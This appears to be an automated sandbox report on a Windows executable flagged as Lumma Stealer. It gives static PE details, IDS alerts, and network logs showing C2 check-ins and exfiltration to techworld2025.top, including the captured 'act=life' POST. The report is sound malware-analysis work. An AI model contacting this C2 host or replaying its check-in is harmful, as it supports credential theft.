File name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File size:	70'254'595 bytes
MD5:	b0ea3bcb6a802deb7952ee8bd7780707
SHA1:	6c816f5f444e2ce559b918693cfe3ef1bed1f5fd
SHA256:	e9919bf4c4c4420a88ae9ff7527b62047b785644a08c6a3bf9d6d9523e0d5f7e
SHA512:	1aa8b6930cd863b8a16a958b44951562a56512df2666b83aa7216d482e7a4127df9b0679495c5cafabb22b0069030f681649f6c1a34d9020a6cabf3eac935167
SSDEEP:	49152:6bAumYSb9rBPNc1fIPSlLWNKleS5Hf60u/Fs:szBs9tPNc9IKlLTle4i0u/2
TLSH:	B8F7233A7B7035DF7646225B2BB109A98864A5D3B3531FBD344F849A735232343F932A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

File Icon


Icon Hash:	8b6b676303939103

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FB59161FCCBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FB59161F9ADh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FB59161F99Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FB59161D29Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FB59161F671h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FB59161D323h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FB59161D29Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x5e168	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x5e168	0x5e200	8053afc3a0025221de62b656b5424b78	False	0.9854125166002656	data	7.91382317420989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x153000	0xf32	0x1000	3298e4489630f1350e7f1a3a92e713fe	False	1.002685546875	OpenPGP Secret Key	7.916360388154981	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41f0	0x59036	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9874793608302843
RT_ICON	0x14d228	0x28ff	PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced	English	United States	1.0010481181515007
RT_ICON	0x14fb28	0x20b1	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0013143744772375
RT_DIALOG	0x151be0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x151ce0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x151e00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x151e60	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0x151e90	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T16:24:15.371437+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49719	104.21.89.159	443	TCP
2025-03-07T16:24:15.836285+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49719	104.21.89.159	443	TCP
2025-03-07T16:24:15.836285+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49719	104.21.89.159	443	TCP
2025-03-07T16:24:17.422345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49720	104.21.89.159	443	TCP
2025-03-07T16:24:17.880813+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49720	104.21.89.159	443	TCP
2025-03-07T16:24:19.857719+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49721	104.21.89.159	443	TCP
2025-03-07T16:24:20.311677+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49721	104.21.89.159	443	TCP
2025-03-07T16:24:22.210499+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49722	104.21.89.159	443	TCP
2025-03-07T16:24:24.421841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49723	104.21.89.159	443	TCP
2025-03-07T16:24:24.880523+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49723	104.21.89.159	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 16:24:13.123650074 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:13.123697996 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:13.123899937 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:13.145333052 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:13.145351887 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.371328115 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.371437073 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.374486923 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.374510050 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.374768972 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.425285101 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.425776005 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.425820112 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.425930023 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.836353064 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.836481094 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.836554050 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.836558104 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.836617947 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.836694956 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.839291096 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.839536905 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.839607000 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.840591908 CET	49719	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.840626955 CET	443	49719	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.842559099 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.842663050 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:15.842773914 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.843070984 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:15.843113899 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.422147989 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.422344923 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.423624992 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.423641920 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.423978090 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.425070047 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.425091982 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.425143957 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.880929947 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.881066084 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.881124020 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.881150961 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.883483887 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.883543015 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.883548975 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.883690119 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.883739948 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.885229111 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.885243893 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.885256052 CET	49720	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.885262012 CET	443	49720	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.975117922 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.975162983 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:17.975245953 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.975626945 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:17.975641012 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:19.857495070 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:19.857718945 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:19.859241009 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:19.859251022 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:19.859618902 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:19.860898018 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:19.861035109 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:19.861078024 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.311743975 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.319890976 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.320120096 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.320154905 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.325520992 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.325592041 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.325602055 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.325743914 CET	443	49721	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.325795889 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.363972902 CET	49721	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.548351049 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.548407078 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:20.548567057 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.548758984 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:20.548775911 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.210319996 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.210499048 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.211568117 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.211580038 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.211910009 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.213016987 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.213099003 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.213104010 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.596451044 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.596507072 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.596550941 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.596565962 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.596599102 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.596715927 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.599102020 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.599186897 CET	443	49722	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.599268913 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.603516102 CET	49722	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.610693932 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.610742092 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:22.610833883 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.611126900 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:22.611140966 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.421765089 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.421840906 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.423095942 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.423109055 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.423437119 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.425129890 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.425177097 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.425204039 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880584955 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880641937 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880678892 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880691051 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.880702972 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880743027 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.880748034 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880808115 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.880850077 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.881172895 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.881187916 CET	443	49723	104.21.89.159	192.168.2.4
Mar 7, 2025 16:24:24.881198883 CET	49723	443	192.168.2.4	104.21.89.159
Mar 7, 2025 16:24:24.881205082 CET	443	49723	104.21.89.159	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 16:23:47.241779089 CET	55634	53	192.168.2.4	1.1.1.1
Mar 7, 2025 16:23:47.250704050 CET	53	55634	1.1.1.1	192.168.2.4
Mar 7, 2025 16:24:12.686656952 CET	57601	53	192.168.2.4	1.1.1.1
Mar 7, 2025 16:24:13.047167063 CET	53	57601	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 16:23:47.241779089 CET	192.168.2.4	1.1.1.1	0x14a2	Standard query (0)	kWEfhpXkjDIXt.kWEfhpXkjDIXt	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:24:12.686656952 CET	192.168.2.4	1.1.1.1	0x61fd	Standard query (0)	techworld2025.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 16:23:47.250704050 CET	1.1.1.1	192.168.2.4	0x14a2	Name error (3)	kWEfhpXkjDIXt.kWEfhpXkjDIXt	none	none	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:24:13.047167063 CET	1.1.1.1	192.168.2.4	0x61fd	No error (0)	techworld2025.top		104.21.89.159	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:24:13.047167063 CET	1.1.1.1	192.168.2.4	0x61fd	No error (0)	techworld2025.top		172.67.189.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

techworld2025.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49719	104.21.89.159	443	8160	C:\Users\user\AppData\Local\Temp\362398\Print.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:24:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: techworld2025.top
2025-03-07 15:24:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-07 15:24:15 UTC	200	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:24:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cloudflare CF-RAY: 91cb1945b9ed78e8-EWR
2025-03-07 15:24:15 UTC	1169	IN	Data Raw: 31 31 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1177<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:24:15 UTC	1369	IN	Data Raw: 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 Data Ascii: d><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf
2025-03-07 15:24:15 UTC	1369	IN	Data Raw: 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 Data Ascii: 0.1.1-/api"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p>
